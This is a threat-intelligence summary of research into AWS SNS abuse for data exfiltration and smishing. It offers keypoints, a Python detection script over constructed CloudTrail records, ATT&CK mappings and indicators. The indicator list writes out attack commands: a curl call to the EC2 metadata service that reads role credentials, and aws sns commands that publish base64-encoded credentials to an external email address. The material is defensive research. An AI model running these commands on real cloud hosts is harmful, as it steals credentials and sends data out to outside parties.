This article explores how threat actors abuse AWS' Simple Notification Service (SNS) for malicious activities such as data exfiltration and phishing campaigns. It outlines the techniques used, security best practices, and detection strategies for monitoring SNS abuse. The findings emphasize that SNS, being a legitimate AWS-managed service reached over the public AWS API, is an easy channel to overlook when guarding against unauthorized access and data loss. Affected: AWS SNS, Cloud Service Providers, Security Operations
Keypoints :
- AWS SNS allows users to send and receive notifications, with usage often seen in cloud environments.
- Threat actors can leverage SNS for data exfiltration: a publish to an SNS topic is an ordinary HTTPS call to the AWS API from an already-authorised principal, so it does not trip egress controls that watch for traffic to unknown hosts.
- The article's whitebox test emulates the malicious behaviour in a controlled AWS environment so that the resulting CloudTrail telemetry can be studied and turned into detections.
- Adversaries can create SNS topics for exfiltrating sensitive data to unauthorized external destinations.
- Security measures such as IAM role permissions, logging, and monitoring can mitigate risks.
- Challenges for adversaries include gaining initial access to a host whose IAM role carries SNS permissions and running the topic-creation, subscription, and publish steps without being detected.
- Detection strategies include monitoring CloudTrail for unusual SNS activity such as topic creation, unexpected subscriptions (in particular to external e-mail, SMS or HTTP endpoints), and publishes to newly created topics from principals such as EC2 instance roles that do not normally use SNS.
- Phishing campaigns may leverage SNS for distributing fraudulent messages, especially in smishing attacks.
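The detection logic sketched in the keypoints above, written out as an added example (this is not code from the Elastic article). It runs three rules over constructed CloudTrail records that mirror the whitebox chain: a Subscribe to an endpoint outside the organisation, topic management calls made with credentials delivered by the EC2 instance metadata service (CloudTrail marks these with `ec2RoleDelivery` in the session context), and a Publish to a topic that recently gained an external subscriber. Assumptions: the corporate mail domain is `example.com`, the account ID and principal names are made up, and Publish calls are being captured as CloudTrail data events (CloudTrail never records the message body, so the rule keys on topic and timing, not content).

```python
"""Flag the SNS exfiltration chain in CloudTrail: CreateTopic -> Subscribe (external) -> Publish."""
from collections import defaultdict
from datetime import datetime, timedelta, timezone
import json

# Assumption: the organisation's own mail domain. Any other e-mail domain is treated as external.
TRUSTED_EMAIL_DOMAINS = {"example.com"}
ACCOUNT = "123456789012"  # constructed sample account ID
TOPIC_ARN = f"arn:aws:sns:us-east-1:{ACCOUNT}:whitebox-sns-topic"
OPS_TOPIC_ARN = f"arn:aws:sns:us-east-1:{ACCOUNT}:ops-alerts"
T0 = datetime(2025, 1, 1, 12, 0, tzinfo=timezone.utc)


def _event(event_id, minutes, name, identity, params, response=None):
    """Build a trimmed CloudTrail record (constructed sample data, not a real log)."""
    return {
        "eventID": event_id,
        "eventTime": (T0 + timedelta(minutes=minutes)).strftime("%Y-%m-%dT%H:%M:%SZ"),
        "eventSource": "sns.amazonaws.com",
        "eventName": name,
        "userIdentity": identity,
        "requestParameters": params,
        "responseElements": response or {},
    }


# Credentials fetched from IMDS carry "ec2RoleDelivery" in sessionContext; a Lambda role does not.
EC2_ROLE = {
    "type": "AssumedRole",
    "arn": f"arn:aws:sts::{ACCOUNT}:assumed-role/whitebox-ec2-role/i-0123456789abcdef0",
    "sessionContext": {
        "sessionIssuer": {"type": "Role", "arn": f"arn:aws:iam::{ACCOUNT}:role/whitebox-ec2-role"},
        "ec2RoleDelivery": "2.0",
    },
}
LAMBDA_ROLE = {
    "type": "AssumedRole",
    "arn": f"arn:aws:sts::{ACCOUNT}:assumed-role/deploy-notifier/deploy-notifier",
    "sessionContext": {"sessionIssuer": {"type": "Role", "arn": f"arn:aws:iam::{ACCOUNT}:role/deploy-notifier"}},
}
ADMIN_USER = {"type": "IAMUser", "arn": f"arn:aws:iam::{ACCOUNT}:user/alice"}

# Constructed sample: the whitebox chain (e1-e3) plus two benign SNS calls (e4, e5).
SAMPLE_EVENTS = [
    _event("e1", 0, "CreateTopic", EC2_ROLE, {"name": "whitebox-sns-topic"}, {"topicArn": TOPIC_ARN}),
    _event("e2", 2, "Subscribe", EC2_ROLE,
           {"topicArn": TOPIC_ARN, "protocol": "email", "endpoint": "exfil@protonmail.com"},
           {"subscriptionArn": "pending confirmation"}),
    _event("e3", 5, "Publish", EC2_ROLE, {"topicArn": TOPIC_ARN, "subject": "Encoded Credentials from EC2"}),
    _event("e4", 7, "Subscribe", ADMIN_USER,
           {"topicArn": OPS_TOPIC_ARN, "protocol": "email", "endpoint": "oncall@example.com"}),
    _event("e5", 9, "Publish", LAMBDA_ROLE, {"topicArn": OPS_TOPIC_ARN, "subject": "deploy ok"}),
]


def parse_time(ev):
    return datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def from_instance_role(ev):
    """True when the call used role credentials handed out by the EC2 instance metadata service."""
    ident = ev["userIdentity"]
    return ident.get("type") == "AssumedRole" and "ec2RoleDelivery" in (ident.get("sessionContext") or {})


def external_endpoint(protocol, endpoint):
    """Subscriptions that deliver data outside the account. SMS/HTTP(S) are assumed to have no approved use."""
    if protocol in ("email", "email-json"):
        return endpoint.rsplit("@", 1)[-1].lower() not in TRUSTED_EMAIL_DOMAINS
    return protocol in ("sms", "http", "https")


def evaluate(events, window=timedelta(hours=1)):
    """Return one finding per rule hit, in event-time order."""
    findings = []
    external_subs = defaultdict(list)  # topicArn -> times at which an external subscriber was added
    for ev in sorted(events, key=parse_time):
        name, params = ev["eventName"], ev.get("requestParameters") or {}
        topic = params.get("topicArn") or (ev.get("responseElements") or {}).get("topicArn")
        base = {"eventID": ev["eventID"], "principal": ev["userIdentity"]["arn"], "topic": topic}
        if name == "Subscribe" and external_endpoint(params.get("protocol", ""), params.get("endpoint", "")):
            external_subs[topic].append(parse_time(ev))
            findings.append({"rule": "external_subscription", "endpoint": params["endpoint"], **base})
        if name in ("CreateTopic", "Subscribe", "SetTopicAttributes") and from_instance_role(ev):
            findings.append({"rule": "instance_role_topic_management", "api": name, **base})
        if name == "Publish" and any(parse_time(ev) - t <= window for t in external_subs.get(topic, [])):
            findings.append({"rule": "publish_after_external_subscription", **base})
    return findings


if __name__ == "__main__":
    print(json.dumps(evaluate(SAMPLE_EVENTS), indent=2))
```

The benign records (an operator subscribing a corporate address, a Lambda role publishing a deployment notice) produce nothing, while the whitebox chain yields four findings across the three rules. In production the same rules would run as a CloudTrail-backed query or SIEM correlation; the one-hour window on the Publish rule is an assumption and should be tuned to the account's normal topic lifecycle.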
MITRE ATT&CK Techniques :
- T1567 – Exfiltration Over Web Service: threat actors use the public AWS API to create an SNS topic, subscribe an external endpoint, and publish stolen data through it.
- T1552.005 – Unsecured Credentials: Cloud Instance Metadata API: adversaries harvest the instance role's temporary credentials from the EC2 metadata service (169.254.169.254) and publish them to the SNS topic.
- T1660 – Phishing (Mobile ATT&CK): SNS's SMS delivery is used for targeted smishing campaigns that reach victims directly.
- T1078.004 – Valid Accounts: Cloud Accounts: adversaries use stolen or harvested AWS credentials with the AWS CLI to perform SNS actions the legitimate principal is allowed to perform.
Indicators of Compromise (artifacts of the article's whitebox emulation; the domain is a public mail provider and the commands are the test commands, so treat them as patterns to detect rather than attacker-specific signatures):
- [Domain] protonmail.com
- [Command] aws sns create-topic --name "whitebox-sns-topic"
- [Command] aws sns subscribe --topic-arn "$TOPIC_ARN" --protocol email --notification-endpoint "[email protected]"
- [Command] aws sns publish --topic-arn "$TOPIC_ARN" --message "$BASE64CONTENT" --subject "Encoded Credentials from EC2"
- [Command] curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE_NAME (IMDSv2 credential retrieval; $TOKEN is the session token obtained from the metadata service beforehand)
Full Story: https://www.elastic.co/security-labs/aws-sns-abuse